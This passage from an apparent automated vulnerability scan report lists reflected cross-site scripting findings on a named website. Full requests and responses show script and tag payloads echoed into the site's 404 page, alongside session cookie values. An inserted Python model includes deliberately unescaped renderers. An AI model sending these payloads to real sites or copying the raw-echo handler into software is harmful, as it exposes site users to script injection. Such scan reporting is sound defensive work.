<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...&Submit3=Searchd6bfd<a>e169058184b&opt=2 was not found on this server.</p>
...[SNIP]...
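
Added example, not part of the original report and not code from the target site: a Python model of the sink that findings 2.2895 and 2.2896 share, so the scanner's grading can be reproduced offline. Every response in this run is the site's 404 page, which writes the requested URL into a text node unencoded. The three renderers are constructed stand-ins for a PHP handler that echoes the raw request URI, one that URL-decodes it first, and one that HTML-encodes it for the between-tags context (htmlspecialchars with ENT_QUOTES in PHP). The page template, paths, probes and canary values are taken from the two findings above; the grading rule ('certain' for an intact script element, 'firm' for any other intact tag) is an assumption about how the report's Confidence column was assigned.

```python
import html
import re
from urllib.parse import quote, unquote

# Constructed stand-in for the 404 page body seen in the report's responses.
PAGE_404 = (
    '<html><head><title>Error 404 - Page Not Found</title></head><body>'
    '<p>The requested URL {uri} was not found on this server.</p>'
    '</body></html>'
)


def render_404_raw(request_uri: str) -> str:
    """Vulnerable: echoes the request URI exactly as received (PHP REQUEST_URI)."""
    return PAGE_404.format(uri=request_uri)


def render_404_decoded(request_uri: str) -> str:
    """Vulnerable: URL-decodes first, so percent-encoded angle brackets become markup."""
    return PAGE_404.format(uri=unquote(request_uri))


def render_404_hardened(request_uri: str) -> str:
    """Fixed: HTML-encode for the text-between-tags context after decoding."""
    return PAGE_404.format(uri=html.escape(unquote(request_uri), quote=True))


def classify_reflection(body: str, canary_l: str, probe: str, canary_r: str) -> str:
    """Grade one reflection the way the report's Confidence column does (assumed rule).

    'certain'  an intact <script> element came back between the canaries
    'firm'     some other HTML tag came back intact, script not demonstrated
    'plain'    probe reflected intact but carries no markup
    'altered'  canaries present but the probe was encoded or filtered
    'none'     not reflected at all
    """
    m = re.search(re.escape(canary_l) + r'(.*?)' + re.escape(canary_r), body, re.DOTALL)
    if not m:
        return 'none'
    echoed = m.group(1)
    if echoed != probe:
        return 'altered'
    if re.search(r'<script\b[^>]*>.*?</script\s*>', echoed, re.I | re.DOTALL):
        return 'certain'
    if re.search(r'<[a-z][^>]*>', echoed, re.I):
        return 'firm'
    return 'plain'


def probe_path_segment(path_before, path_after, probe, renderer, percent_encode=False,
                       canary_l='57437', canary_r='cca2c0d5930'):
    """Splice the probe into a path segment, render the 404 as the handler would, grade it.

    percent_encode=True models a browser that encodes '<' and '>' in the path
    instead of sending them raw in the request line as the scanner did.
    """
    delivered = quote(probe, safe='') if percent_encode else probe
    uri = f'{path_before}{canary_l}{delivered}{canary_r}{path_after}'
    return classify_reflection(renderer(uri), canary_l, probe, canary_r)


def run_report():
    """Reproduce the 2.2895 (script) and 2.2896 (<a>) probes against each renderer."""
    before, after = '/detail/40/themes/search.php', '?keyword=search...&Submit3=Search&opt=2'
    script, tag = '<script>alert(1)</script>', '<a>'
    results = {}
    for name, renderer in (('raw', render_404_raw), ('decoded', render_404_decoded),
                           ('hardened', render_404_hardened)):
        results[name] = {
            'script_raw': probe_path_segment(before, after, script, renderer),
            'tag_raw': probe_path_segment(before, after, tag, renderer),
            'script_pct': probe_path_segment(before, after, script, renderer, percent_encode=True),
        }
    return results


if __name__ == '__main__':
    for handler, grades in run_report().items():
        print(handler, grades)
```

The percent-encoded cases are the caveat for the REST URL parameter findings: the scanner sent `<` and `>` raw in the request line, but a browser that percent-encodes them in the path only triggers the raw-echo handler if the handler decodes before printing. Confirm delivery from a real browser before rating a path-segment reflection as exploitable; the query-string and parameter-name findings are unaffected by this because the same bytes reach the handler either way once it decodes.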

2.2897. http://www.resellerbase.com/detail/40/themes/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 4ac9f<a>14c8cdaae76 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/search.php?keyword=search...4ac9f<a>14c8cdaae76&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...4ac9f<a>14c8cdaae76&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2898. http://www.resellerbase.com/detail/40/themes/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4feb6<script>alert(1)</script>5aca5939ce9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2&4feb6<script>alert(1)</script>5aca5939ce9=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:23:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=2&4feb6<script>alert(1)</script>5aca5939ce9=1 was not found on this server.</p>
...[SNIP]...

2.2899. http://www.resellerbase.com/detail/40/themes/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/themes/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 7b347<a>cb580786a3f was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=27b347<a>cb580786a3f HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/40/themes/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:22:52 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/themes/search.php?keyword=search...&Submit3=Search&opt=27b347<a>cb580786a3f was not found on this server.</p>
...[SNIP]...

2.2900. http://www.resellerbase.com/detail/40/videosecrets-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/videosecrets-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c5241<script>alert(1)</script>0606e461cd8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detailc5241<script>alert(1)</script>0606e461cd8/40/videosecrets-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailc5241<script>alert(1)</script>0606e461cd8/40/videosecrets-com.html was not found on this server.</p>
...[SNIP]...

2.2901. http://www.resellerbase.com/detail/40/videosecrets-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/40/videosecrets-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6559f<a>10475398335 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/406559f<a>10475398335/videosecrets-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:27:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/406559f<a>10475398335/videosecrets-com.html was not found on this server.</p>
...[SNIP]...

2.2902. http://www.resellerbase.com/detail/40/videosecrets-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/40/videosecrets-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4ea97<script>alert(1)</script>cf8530c3ae7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/40/4ea97<script>alert(1)</script>cf8530c3ae7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:28:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/40/4ea97<script>alert(1)</script>cf8530c3ae7 was not found on this server.</p>
...[SNIP]...

2.2903. http://www.resellerbase.com/detail/41/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8daf6<script>alert(1)</script>5d831ede408 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail8daf6<script>alert(1)</script>5d831ede408/41/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail8daf6<script>alert(1)</script>5d831ede408/41/ was not found on this server.</p>
...[SNIP]...

2.2904. http://www.resellerbase.com/detail/41/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 50b52<script>alert(1)</script>fc0263d503a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4150b52<script>alert(1)</script>fc0263d503a/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4150b52<script>alert(1)</script>fc0263d503a/ was not found on this server.</p>
...[SNIP]...

2.2905. http://www.resellerbase.com/detail/41/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d0496<script>alert(1)</script>63d019099f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/?d0496<script>alert(1)</script>63d019099f5=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/?d0496<script>alert(1)</script>63d019099f5=1 was not found on this server.</p>
...[SNIP]...

2.2906. http://www.resellerbase.com/detail/41/nudistfriends-com.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/nudistfriends-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96711<script>alert(1)</script>b2a08b935b3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail96711<script>alert(1)</script>b2a08b935b3/41/nudistfriends-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail96711<script>alert(1)</script>b2a08b935b3/41/nudistfriends-com.html was not found on this server.</p>
...[SNIP]...

2.2907. http://www.resellerbase.com/detail/41/nudistfriends-com.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/41/nudistfriends-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 61e88<a>34b6200dcc7 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/4161e88<a>34b6200dcc7/nudistfriends-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4161e88<a>34b6200dcc7/nudistfriends-com.html was not found on this server.</p>
...[SNIP]...

2.2908. http://www.resellerbase.com/detail/41/nudistfriends-com.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/nudistfriends-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4b6bd<script>alert(1)</script>dbc45171972 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/4b6bd<script>alert(1)</script>dbc45171972 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:26:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/4b6bd<script>alert(1)</script>dbc45171972 was not found on this server.</p>
...[SNIP]...

2.2909. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 54df8<script>alert(1)</script>5343846389b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail54df8<script>alert(1)</script>5343846389b/41/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:56 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail54df8<script>alert(1)</script>5343846389b/41/rating.php was not found on this server.</p>
...[SNIP]...

2.2910. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ae04c<script>alert(1)</script>d1e8a3d2586a6d3e7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailae04c<script>alert(1)</script>d1e8a3d2586a6d3e7/41/rating.php?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailae04c<script>alert(1)</script>d1e8a3d2586a6d3e7/41/rating.php?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2911. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4bc3a<script>alert(1)</script>0c2221b7c4fd77228 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/414bc3a<script>alert(1)</script>0c2221b7c4fd77228/rating.php?id=41&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/41/nudistfriends-com.html
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/414bc3a<script>alert(1)</script>0c2221b7c4fd77228/rating.php?id=41&rating=5 was not found on this server.</p>
...[SNIP]...

2.2912. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 28e85<script>alert(1)</script>ee8adf590b5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4128e85<script>alert(1)</script>ee8adf590b5/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4128e85<script>alert(1)</script>ee8adf590b5/rating.php was not found on this server.</p>
...[SNIP]...

2.2913. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 58f61<script>alert(1)</script>5a0fca9b53c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/41/rating.php58f61<script>alert(1)</script>5a0fca9b53c HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/41/rating.php58f61<script>alert(1)</script>5a0fca9b53c was not found on this server.</p>
...[SNIP]...

2.2914. http://www.resellerbase.com/detail/41/rating.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/41/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63dc3<script>alert(1)</script>93df9e2b0beee2f2e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

